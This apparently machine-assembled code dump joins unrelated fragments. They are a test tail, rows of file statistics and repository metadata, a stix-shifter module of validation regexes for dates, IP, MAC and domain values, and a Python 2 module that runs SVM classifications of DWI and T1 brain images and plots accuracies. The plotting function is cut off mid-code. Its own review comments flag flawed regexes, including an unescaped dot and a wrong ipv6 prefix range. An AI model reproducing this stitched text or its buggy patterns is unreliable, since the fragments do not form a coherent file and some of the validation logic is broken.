    generated = os.path.join(tmp_path, "setup.py")
    assert os.path.isfile(generated)
    with open(generated, "r") as fh:
        assert fh.read() == expected
| 31.034483
| 187
| 0.657222
| 260
| 1,800
| 4.465385
| 0.253846
| 0.036176
| 0.062016
| 0.079242
| 0.873385
| 0.873385
| 0.873385
| 0.850991
| 0.819983
| 0.819983
| 0
| 0.032236
| 0.172778
| 1,800
| 57
| 188
| 31.578947
| 0.747482
| 0
| 0
| 0.782609
| 0
| 0.086957
| 0.601111
| 0.101111
| 0
| 0
| 0
| 0
| 0.086957
| 1
| 0.043478
| false
| 0
| 0.086957
| 0
| 0.130435
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b2bcd863b8479423dc873d1bd9479ebf497aa268
| 2,446
|
py
|
Python
|
stix_shifter_utils/stix_translation/src/json_to_stix/observable.py
|
lizstranger/stix-shifter
|
d1d979085e85853e11d206d87c9e75fe975ab61d
|
[
"Apache-2.0"
] | 1
|
2020-08-31T21:41:45.000Z
|
2020-08-31T21:41:45.000Z
|
stix_shifter_utils/stix_translation/src/json_to_stix/observable.py
|
lizstranger/stix-shifter
|
d1d979085e85853e11d206d87c9e75fe975ab61d
|
[
"Apache-2.0"
] | null | null | null |
stix_shifter_utils/stix_translation/src/json_to_stix/observable.py
|
lizstranger/stix-shifter
|
d1d979085e85853e11d206d87c9e75fe975ab61d
|
[
"Apache-2.0"
] | null | null | null |
# Validation patterns for STIX observable values.
# FIX: all patterns are now raw strings so regex escapes like \d, \. and \/
# are explicit.  The runtime values are unchanged (Python left these unknown
# escapes alone), but non-raw '\d' raises DeprecationWarning/SyntaxWarning on
# modern interpreters and is a latent trap for edits.
REGEX = {
    # NOTE(review): the '.' in '(.\d+)?' matches any character, not just a
    # literal dot -- presumably intended as '\.'; kept as-is for compatibility.
    'date': r'\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}(.\d+)?Z',
    'ipv4': (r'^((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$'),  # noqa: E501
    'ipv6': (r'^(([0-9a-fA-F]{1,4}:){7,7}[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,7}:|([0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,5}(:[0-9a-fA-F]{1,4}){1,2}|([0-9a-fA-F]{1,4}:){1,4}(:[0-9a-fA-F]{1,4}){1,3}|([0-9a-fA-F]{1,4}:){1,3}(:[0-9a-fA-F]{1,4}){1,4}|([0-9a-fA-F]{1,4}:){1,2}(:[0-9a-fA-F]{1,4}){1,5}|[0-9a-fA-F]{1,4}:((:[0-9a-fA-F]{1,4}){1,6})|:((:[0-9a-fA-F]{1,4}){1,7}|:)|fe80:(:[0-9a-fA-F]{0,4}){0,4}%[0-9a-zA-Z]{1,}|::(ffff(:0{1,4}){0,1}:){0,1}((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])|([0-9a-fA-F]{1,4}:){1,4}:((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]))$'),
    'mac': (r'^(([0-9a-fA-F]{2}[:-]){5}([0-9a-fA-F]{2})|([0-9a-fA-F]{3}[\.]){3}([0-9a-fA-F]{3}))$'),
    'ipv4_cidr': (r'^((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\/(([1-2][0-9])|(3[0-2])|[0-9])$'),  # noqa: E501
    'domain_name': (r'^(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z0-9][a-z0-9-]{0,61}[a-z0-9]$'),
    # NOTE(review): the prefix part '(1[0-2][0-8])' accepts e.g. 108/118 but
    # rejects 109/129 -- looks like a buggy spelling of 100-128; kept as-is to
    # preserve current matching behavior.
    'ipv6_cidr': (r'^(([0-9a-fA-F]{1,4}:){7,7}[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,7}:|([0-9a-fA-F]{1,4}:){1,6}:' r'[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,5}(:[0-9a-fA-F]{1,4}){1,2}|([0-9a-fA-F]{1,4}:){1,4}(:[0-9a-fA-F]{1,4}){1,3}|' r'([0-9a-fA-F]{1,4}:){1,3}(:[0-9a-fA-F]{1,4}){1,4}|([0-9a-fA-F]{1,4}:){1,2}(:[0-9a-fA-F]{1,4}){1,5}|' r'[0-9a-fA-F]{1,4}:((:[0-9a-fA-F]{1,4}){1,6})|:((:[0-9a-fA-F]{1,4}){1,7}|:)|fe80:(:[0-9a-fA-F]{0,4}){0,4}%' r'[0-9a-zA-Z]{1,}|::(ffff(:0{1,4}){0,1}:){0,1}((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}(25[0-5]|(2[0-4]|1{0,1}' r'[0-9]){0,1}[0-9])|([0-9a-fA-F]{1,4}:){1,4}:((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]))\/((1[0-2][0-8])|([1-9][0-9])|[0-9])$')
}
# STIX observable property name -> validation rule applied by json_to_stix.
properties = {
    'first_observed': {
        'valid_regex': REGEX['date']
    },
    'last_observed': {
        'valid_regex': REGEX['date']
    },
    'ipv4-addr.value': {
        'valid_regex': REGEX['ipv4']
    },
    'ipv6-addr.value': {
        'valid_regex': REGEX['ipv6']
    },
    'created': {
        'valid_regex': REGEX['date']
    },
    'modified': {
        'valid_regex': REGEX['date']
    },
    'domain-name.value': {
        'valid_regex': REGEX['domain_name']
    }
}
| 71.941176
| 733
| 0.404742
| 625
| 2,446
| 1.5632
| 0.0688
| 0.128966
| 0.204708
| 0.24565
| 0.776868
| 0.634596
| 0.634596
| 0.634596
| 0.634596
| 0.634596
| 0
| 0.222819
| 0.086263
| 2,446
| 33
| 734
| 74.121212
| 0.214318
| 0.008585
| 0
| 0.125
| 0
| 0.375
| 0.828241
| 0.727085
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
b2e030852aba8bd3b7584c8e373daf62ec2fb89e
| 79,633
|
py
|
Python
|
Paper_Specific_Versions/2018_OHBM_DTI/Code/clinica_ml_dwi/mlworkflow_dwi_utils.py
|
adamwild/AD-ML
|
e4ac0b7d312ab482b9b52bb3f5c6745cc06431e9
|
[
"MIT"
] | null | null | null |
Paper_Specific_Versions/2018_OHBM_DTI/Code/clinica_ml_dwi/mlworkflow_dwi_utils.py
|
adamwild/AD-ML
|
e4ac0b7d312ab482b9b52bb3f5c6745cc06431e9
|
[
"MIT"
] | null | null | null |
Paper_Specific_Versions/2018_OHBM_DTI/Code/clinica_ml_dwi/mlworkflow_dwi_utils.py
|
adamwild/AD-ML
|
e4ac0b7d312ab482b9b52bb3f5c6745cc06431e9
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
__author__ = ["Junhao Wen", "Jorge Samper-Gonzalez"]
__copyright__ = "Copyright 2016-2018 The Aramis Lab Team"
__credits__ = ["Junhao Wen"]
__license__ = "See LICENSE.txt file"
__version__ = "0.1.0"
__status__ = "Development"
import os
import errno
from os import path
from pandas.io import parsers
from mlworkflow_dwi import DWI_VB_RepHoldOut_DualSVM, DWI_RB_RepHoldOut_DualSVM
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
from clinica.pipelines.machine_learning.ml_workflows import RB_RepHoldOut_DualSVM, VB_RepHoldOut_DualSVM
from os import path
from scipy import stats
def run_voxel_based_classification(caps_directory, diagnoses_tsv, subjects_visits_tsv, output_dir, task, n_threads, n_iterations, test_size, grid_search_folds,
                                  balanced_down_sample=False, modality='dwi', dwi_maps=['fa', 'md'], fwhm=[8],
                                  tissue_type = ['WM', 'GM', 'GM_WM'], threshold=[0.3], group_id='ADNIbl'):
    """
    This is a function to run the Voxel-based classification tasks after the imaging processing pipeline of ADNI
    :param caps_directory: caps directory for Clinica outputs
    :param diagnoses_tsv:
    :param subjects_visits_tsv:
    :param output_dir: the path to store the classification outputs
    :param tissue_type: one of these:
    :param threshold: the threshold to masking the features
    :param fwhm: the threshold to smooth the mask of tissues
    :param dwi_maps: the maps based on DWI, currently, we just have maps from DTI model.
    :param balanced_down_sample: int, how many times to repeat for the downsampling procedures to create the balanced data, default is 0, which means we do not force the data to be balanced
    :param task: the name of the task to store the classification results
    :param n_threads: number of cores to use for this classification
    :param n_iterations: number of runs for the RepHoldOut
    :param test_size: proportion for the testing dataset
    :param grid_search_folds: number of runs to search the hyperparameters
    :return:

    NOTE(review): dwi_maps/fwhm/tissue_type/threshold are mutable default
    arguments; they are only iterated here, but confirm no caller mutates them.
    """
    # Pre-compute the train/test splits once so that every feature/parameter
    # combination below is evaluated on the same cross-validation splits.
    splits_indices, splits_indices_pickle = split_subjects_to_pickle(diagnoses_tsv, n_iterations=n_iterations,
                                                                     test_size=test_size, balanced=balanced_down_sample)
    if modality == 'dwi':
        # ## run the classification
        if balanced_down_sample:  # balanced (randomly down-sampled) variant
            print "Using balanced data to do classifications!!!"
            for dwi_map in dwi_maps:
                for i in tissue_type:
                    for j in threshold:
                        for k in fwhm:
                            # one output directory per (map, tissue, threshold, fwhm) combination
                            classification_dir = path.join(output_dir, 'RandomBalanced',
                                                           task + '_' + i + '_' + str(j) + '_' + str(k),
                                                           dwi_map)
                            if not path.exists(classification_dir):
                                os.makedirs(classification_dir)
                                print "\nRunning %s" % classification_dir
                                wf = DWI_VB_RepHoldOut_DualSVM(caps_directory, subjects_visits_tsv, diagnoses_tsv, dwi_map,
                                                               i, j, classification_dir, fwhm=k,
                                                               n_threads=n_threads, n_iterations=n_iterations, test_size=test_size,
                                                               grid_search_folds=grid_search_folds, splits_indices=splits_indices)
                                wf.run()
                            else:
                                # an existing directory is treated as "already done" and skipped
                                print "This combination has been classified, just skip: %s " % classification_dir
        else:  ## original classification (imbalanced / raw data)
            print "Using raw data to do classifications!!!"
            for dwi_map in dwi_maps:
                for i in tissue_type:
                    for j in threshold:
                        for k in fwhm:
                            classification_dir = path.join(output_dir,
                                                           task + '_' + i + '_' + str(j) + '_' + str(k),
                                                           dwi_map)
                            if not path.exists(classification_dir):
                                os.makedirs(classification_dir)
                                print "\nRunning %s" % classification_dir
                                wf = DWI_VB_RepHoldOut_DualSVM(caps_directory, subjects_visits_tsv, diagnoses_tsv, dwi_map,
                                                               i, j, classification_dir, fwhm=k,
                                                               n_threads=n_threads, n_iterations=n_iterations,
                                                               test_size=test_size,
                                                               grid_search_folds=grid_search_folds, splits_indices=splits_indices)
                                wf.run()
                            else:
                                print "This combination has been classified, just skip: %s " % classification_dir
    elif modality == 'T1':  ## Run T1 classification
        if balanced_down_sample:  # balanced variant
            print "Using balanced data to do classifications!!!"
            for k in fwhm:
                classification_dir = path.join(output_dir, 'RandomBalanced',
                                               task + '_fwhm_' + str(k))
                if not path.exists(classification_dir):
                    os.makedirs(classification_dir)
                    print "\nRunning %s" % classification_dir
                    wf = VB_RepHoldOut_DualSVM(caps_directory, subjects_visits_tsv, diagnoses_tsv, group_id, modality,
                                               classification_dir, fwhm=k, n_threads=n_threads, n_iterations=n_iterations,
                                               test_size=test_size, splits_indices=splits_indices)
                    wf.run()
                else:
                    print "This combination has been classified, just skip: %s " % classification_dir
        else:  ## original classification
            print "Using raw data to do classifications!!!"
            #### have the same lists for all the iterations
            for k in fwhm:
                classification_dir = path.join(output_dir,
                                               task + '_fwhm_' + str(k))
                if not path.exists(classification_dir):
                    os.makedirs(classification_dir)
                    print "\nRunning %s" % classification_dir
                    wf = VB_RepHoldOut_DualSVM(caps_directory, subjects_visits_tsv, diagnoses_tsv, group_id, modality,
                                               classification_dir, fwhm=k, n_threads=n_threads,
                                               n_iterations=n_iterations,
                                               test_size=test_size, splits_indices=splits_indices)
                    wf.run()
                else:
                    print "This combination has been classified, just skip: %s " % classification_dir
    else:
        # unsupported modality: silently do nothing
        pass
def run_roi_based_classification(caps_directory, diagnoses_tsv, subjects_visits_tsv, output_dir, atlas,
                                 task, n_threads, n_iterations, test_size, grid_search_folds, balanced_down_sample=False,
                                 dwi_maps=['fa', 'md'], modality='dwi', group_id='ADNIbl'):
    """
    This is a function to run the ROI-based classification tasks after the imaging processing pipeline of ADNI
    :param caps_directory: caps directory for Clinica outputs
    :param diagnoses_tsv:
    :param subjects_visits_tsv:
    :param output_dir: the path to store the classification outputs
    :param atlas: one of these: ['JHUDTI81', 'JHUTracts0', 'JHUTracts25']
    :param dwi_maps: the maps based on DWI, currently, we just have maps from DTI model.
    :param balanced_down_sample: int, how many times to repeat for the downsampling procedures to create the balanced data, default is 0, which means we do not force the data to be balanced
    :param task: the name of the task to store the classification results
    :param n_threads: number of cores to use for this classification
    :param n_iterations: number of runs for the RepHoldOut
    :param test_size: proportion for the testing dataset
    :param grid_search_folds: number of runs to search the hyperparameters
    :return:

    NOTE(review): dwi_maps is a mutable default argument; it is only iterated
    here, but confirm no caller mutates it.
    """
    # Pre-compute the train/test splits once so that every atlas/map
    # combination below is evaluated on the same cross-validation splits.
    splits_indices, splits_indices_pickle = split_subjects_to_pickle(diagnoses_tsv, n_iterations=n_iterations,
                                                                     test_size=test_size, balanced=balanced_down_sample)
    if modality == 'dwi':
        ## run the classification
        if balanced_down_sample:  # balanced (randomly down-sampled) variant
            print "Using balanced data to do classifications!!!"
            for dwi_map in dwi_maps:
                for i in atlas:
                    # one output directory per (atlas, map) combination
                    classification_dir = path.join(output_dir, 'RandomBalanced',
                                                   task + '_' + i,
                                                   dwi_map)
                    if not path.exists(classification_dir):
                        os.makedirs(classification_dir)
                        print "\nRunning %s" % classification_dir
                        wf = DWI_RB_RepHoldOut_DualSVM(caps_directory, subjects_visits_tsv, diagnoses_tsv, i, dwi_map,
                                                       classification_dir,
                                                       n_threads=n_threads, n_iterations=n_iterations,
                                                       test_size=test_size,
                                                       grid_search_folds=grid_search_folds,
                                                       splits_indices=splits_indices)
                        wf.run()
                    else:
                        # an existing directory is treated as "already done" and skipped
                        print "This combination has been classified, just skip: %s " % classification_dir
        else:
            print "Using raw data to do classifications!!!"
            for dwi_map in dwi_maps:
                for i in atlas:
                    classification_dir = path.join(output_dir,
                                                   task + '_' + i,
                                                   dwi_map)
                    if not path.exists(classification_dir):
                        os.makedirs(classification_dir)
                        print "\nRunning %s" % classification_dir
                        wf = DWI_RB_RepHoldOut_DualSVM(caps_directory, subjects_visits_tsv, diagnoses_tsv, i,
                                                       dwi_map,
                                                       classification_dir,
                                                       n_threads=n_threads, n_iterations=n_iterations,
                                                       test_size=test_size,
                                                       grid_search_folds=grid_search_folds, splits_indices=splits_indices)
                        wf.run()
                    else:
                        print "This combination has been classified, just skip: %s " % classification_dir
    elif modality == 'T1':
        ## run the classification
        if balanced_down_sample:  # balanced variant
            print "Using balanced data to do classifications!!!"
            for i in atlas:
                classification_dir = path.join(output_dir, 'RandomBalanced',
                                               task + '_' + i)
                if not path.exists(classification_dir):
                    os.makedirs(classification_dir)
                    print "\nRunning %s" % classification_dir
                    wf = RB_RepHoldOut_DualSVM(caps_directory, subjects_visits_tsv, diagnoses_tsv, group_id, modality, i,
                                               classification_dir, n_threads=n_threads, n_iterations=n_iterations, test_size=test_size,
                                               splits_indices=splits_indices)
                    wf.run()
                else:
                    print "This combination has been classified, just skip: %s " % classification_dir
        else:
            print "Using raw data to do classifications!!!"
            for i in atlas:
                classification_dir = path.join(output_dir,
                                               task + '_' + i)
                if not path.exists(classification_dir):
                    os.makedirs(classification_dir)
                    print "\nRunning %s" % classification_dir
                    wf = RB_RepHoldOut_DualSVM(caps_directory, subjects_visits_tsv, diagnoses_tsv, group_id,
                                               modality, i,
                                               classification_dir, n_threads=n_threads, n_iterations=n_iterations,
                                               test_size=test_size, splits_indices=splits_indices)
                    wf.run()
                else:
                    print "This combination has been classified, just skip: %s " % classification_dir
    else:
        # unsupported modality: silently do nothing
        pass
def classification_performances_violin_plot_imbalanced_vs_balanced(classification_result_path, tasks_imbalanced, tasks_balanced,
n_iterations, raw_classification=True, feature_type='voxel', modality='dwi', figure_number=0):
"""
This is a function to plot the classification performances among different tasks_imbalanced:
First subplot is to plot the three tissue combinations for each tasks_imbalanced for raw data classification
Second subplot is for balanced classifications.
:param classification_result_path: str, should be absolute path to the classification results.
:param tasks_imbalanced: list, containing several binary classification tasks_imbalanced
:param n_iterations: number of iterations to use for CV process
:param dwi_map: str, one of diffusion maps, e.g, fa
:return:
"""
if modality == 'dwi' and figure_number == 0:
results_balanced_acc_fa_imbalanced = []
results_balanced_acc_fa_balanced = []
results_balanced_acc_md_imbalanced = []
results_balanced_acc_md_balanced = []
if feature_type == 'voxel':
tissue_combinations = ['WM', 'GM', 'GM_WM']
ticklabels_imbalanced = [i.replace('_', ' ') for i in tasks_imbalanced]
# ticklabels_imbalanced = ['CN vs AD', 'CN_vs_MCI', 'CN_vs_pMCI', 'sMCI_vs_pMCI']
ticklabels_balanced = [i.replace('_', ' ') for i in tasks_balanced]
# ticklabels_balanced = ['CN_vs_MCI', 'CN_vs_pMCI', 'sMCI_vs_pMCI']
if raw_classification == True:
print "Plot for original classifications"
## get FA
for task in tasks_imbalanced:
for tissue in tissue_combinations:
tsvs_path = os.path.join(classification_result_path, task + '_VB_' + tissue + '_0.3_8', 'fa')
balanced_accuracy = []
for i in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' +str(i), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append((pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_balanced_acc_fa_imbalanced.append(balanced_accuracy)
## get MD
for task in tasks_imbalanced:
for tissue in tissue_combinations:
tsvs_path = os.path.join(classification_result_path, task + '_VB_' + tissue + '_0.3_8', 'md')
balanced_accuracy = []
for i in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(i), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append((pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_balanced_acc_md_imbalanced.append(balanced_accuracy)
##### FAs
### transfer the list into an array with this shape: n_iterations*n_tasks_imbalanced
metric = np.array(results_balanced_acc_fa_imbalanced).transpose()
## define the violin's postions
pos = [1, 2, 3, 5, 6, 7, 9, 10, 11, 13, 14, 15]
color = ['#FF0000', '#87CEFA', '#90EE90'] *len(tasks_imbalanced)# red, blue and green
legend = ['WM', 'GM', 'GM+WM']
## define the size of th image
fig, ax = plt.subplots(2,figsize=[15, 10])
line_coll = ax[0].violinplot(metric, pos, widths=0.5, bw_method=0.2, showmeans=True, showextrema=False)
for cc, ln in enumerate(line_coll['bodies']):
ln.set_facecolor(color[cc])
ax[0].legend(legend, loc='upper right', fontsize=10, frameon=True)
ax[0].grid(axis='y', which='major', linestyle='dotted')
ax[0].set_xticks([2, 6, 10, 14])
ax[0].set_yticks([0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0])
ax[0].set_xticklabels(ticklabels_imbalanced, rotation=0, fontsize=15) # 'vertical'
ax[0].set_ylabel('Balanced accuracy', rotation=90, fontsize=15) # 'vertical'
mean = np.mean(metric, 0)
std = np.std(metric, 0)
inds = np.array(pos)
ax[0].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[0].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[0].hlines(mean - std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[0].hlines(mean + std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[0].set_ylim(0.1, 1)
ax[0].set_title('A: FA Voxel-based classifications', fontsize=15)
##### MD
### transfer the list into an array with this shape: n_iterations*n_tasks_imbalanced
metric = np.array(results_balanced_acc_md_imbalanced).transpose()
## define the size of th image
line_coll = ax[1].violinplot(metric, pos, widths=0.5, bw_method=0.2, showmeans=True, showextrema=False)
for cc, ln in enumerate(line_coll['bodies']):
ln.set_facecolor(color[cc])
ax[1].legend(legend, loc='upper right', fontsize=10, frameon=True)
ax[1].grid(axis='y', which='major', linestyle='dotted')
ax[1].set_xticks([2, 6, 10, 14])
ax[1].set_yticks([0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0])
ax[1].set_xticklabels(ticklabels_imbalanced, rotation=0, fontsize=15) # 'vertical'
ax[1].set_ylabel('Balanced accuracy', rotation=90, fontsize=15) # 'vertical'
mean = np.mean(metric, 0)
std = np.std(metric, 0)
inds = np.array(pos)
ax[1].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[1].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[1].hlines(mean - std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[1].hlines(mean + std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[1].set_ylim(0.1, 1)
ax[1].set_title('B: MDVoxel-based classifications', fontsize=15)
plt.savefig(os.path.join(classification_result_path,
'voxel_violin_imbalanced.png'), additional_artists=plt.legend, bbox_inches="tight")
else:
print "Plot for balanced classifications"
## get FA
for task in tasks_balanced:
for tissue in tissue_combinations:
balanced_accuracy = []
tsvs_path = os.path.join(classification_result_path, 'RandomBalanced', task + '_VB_' + tissue + '_0.3_8', 'fa')
for k in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(k), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append((pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_balanced_acc_fa_balanced.append(balanced_accuracy)
## get MD
for task in tasks_balanced:
for tissue in tissue_combinations:
balanced_accuracy = []
tsvs_path = os.path.join(classification_result_path, 'RandomBalanced', task + '_VB_' + tissue + '_0.3_8', 'md')
for k in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(k), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append((pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_balanced_acc_md_balanced.append(balanced_accuracy)
##### FA
### transfer the list into an array with this shape: n_iterations*n_tasks_balanced
metric = np.array(results_balanced_acc_fa_balanced).transpose()
## define the violin's postions
pos = [1, 2, 3, 5, 6, 7, 9, 10, 11]
color = ['#FF0000', '#87CEFA', '#90EE90'] *len(tasks_imbalanced)# red, blue and green
legend = ['WM', 'GM', 'GM+WM']
## define the size of th image
fig, ax = plt.subplots(2, figsize=[15, 10])
line_coll = ax[0].violinplot(metric, pos, widths=0.5, bw_method=0.2, showmeans=True, showextrema=False)
for cc, ln in enumerate(line_coll['bodies']):
ln.set_facecolor(color[cc])
ax[0].legend(legend, loc='upper right', fontsize=10, frameon=True)
ax[0].grid(axis='y', which='major', linestyle='dotted')
ax[0].set_xticks([2, 6, 10, 14])
ax[0].set_yticks([0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0])
ax[0].set_xticklabels(ticklabels_balanced, rotation=0, fontsize=15) # 'vertical'
ax[0].set_ylabel('Balanced accuracy', rotation=90, fontsize=15) # 'vertical'
mean = np.mean(metric, 0)
std = np.std(metric, 0)
inds = np.array(pos)
ax[0].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[0].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[0].hlines(mean - std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[0].hlines(mean + std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[0].set_ylim(0.1, 1)
ax[0].set_title('A: FA Voxel-based classification with balanced data', fontsize=15)
##### MD
### transfer the list into an array with this shape: n_iterations*n_tasks_balanced
metric = np.array(results_balanced_acc_md_balanced).transpose()
## define the size of th image
line_coll = ax[1].violinplot(metric, pos, widths=0.5, bw_method=0.2, showmeans=True, showextrema=False)
for cc, ln in enumerate(line_coll['bodies']):
ln.set_facecolor(color[cc])
ax[1].legend(legend, loc='upper right', fontsize=10, frameon=True)
ax[1].grid(axis='y', which='major', linestyle='dotted')
ax[1].set_xticks([2, 6, 10, 14])
ax[1].set_yticks([0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0])
ax[1].set_xticklabels(ticklabels_balanced, rotation=0, fontsize=15) # 'vertical'
ax[1].set_ylabel('Balanced accuracy', rotation=90, fontsize=15) # 'vertical'
mean = np.mean(metric, 0)
std = np.std(metric, 0)
inds = np.array(pos)
ax[1].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[1].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[1].hlines(mean - std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[1].hlines(mean + std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[1].set_ylim(0.1, 1)
ax[1].set_title('B: MD Voxel-based classification with balanced data', fontsize=15)
plt.savefig(os.path.join(classification_result_path,
'voxel_violin_balanced.png'), additional_artists=plt.legend, bbox_inches="tight")
else: ##### for DWI regions
atlases = ['JHUDTI81', 'JHUTracts25']
ticklabels_imbalanced = [i.replace('_', ' ') for i in tasks_imbalanced]
# ticklabels_imbalanced = ['CN vs AD', 'CN_vs_MCI', 'CN_vs_pMCI', 'sMCI_vs_pMCI']
ticklabels_balanced = [i.replace('_', ' ') for i in tasks_balanced]
# ticklabels_balanced = ['CN_vs_MCI', 'CN_vs_pMCI', 'sMCI_vs_pMCI']
if raw_classification == True:
print "Plot for original classifications"
## get FA
for task in tasks_imbalanced:
for atlas in atlases:
tsvs_path = os.path.join(classification_result_path, task + '_RB_' + atlas, 'fa')
balanced_accuracy = []
for i in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(i), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append(
(pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_balanced_acc_fa_imbalanced.append(balanced_accuracy)
## get MD
for task in tasks_imbalanced:
for atlas in atlases:
tsvs_path = os.path.join(classification_result_path, task + '_RB_' + atlas, 'md')
balanced_accuracy = []
for i in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(i), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append(
(pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_balanced_acc_md_imbalanced.append(balanced_accuracy)
##### FAs
### transfer the list into an array with this shape: n_iterations*n_tasks_imbalanced
metric = np.array(results_balanced_acc_fa_imbalanced).transpose()
## define the violin's postions
pos = [1, 2, 4, 5, 7, 8, 10, 11]
# color = ['#FF0000', '#87CEFA', '#90EE90'] * len(tasks_imbalanced) # red, blue and green
color = ['#FF0000', '#87CEFA'] * len(tasks_imbalanced) # red, blue
legend = ['JHULabel', 'JHUTract']
## define the size of th image
fig, ax = plt.subplots(2, figsize=[15, 10])
line_coll = ax[0].violinplot(metric, pos, widths=0.5, bw_method=0.2, showmeans=True, showextrema=False)
for cc, ln in enumerate(line_coll['bodies']):
ln.set_facecolor(color[cc])
ax[0].legend(legend, loc='upper right', fontsize=10, frameon=True)
ax[0].grid(axis='y', which='major', linestyle='dotted')
ax[0].set_xticks([1.5, 4.5, 7.5, 10.5])
ax[0].set_yticks([0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0])
ax[0].set_xticklabels(ticklabels_imbalanced, rotation=0, fontsize=15) # 'vertical'
ax[0].set_ylabel('Balanced accuracy', rotation=90, fontsize=15) # 'vertical'
mean = np.mean(metric, 0)
std = np.std(metric, 0)
inds = np.array(pos)
ax[0].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[0].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[0].hlines(mean - std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[0].hlines(mean + std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[0].set_ylim(0.1, 1)
ax[0].set_title('C: FA Region-based classifications', fontsize=15)
##### MD
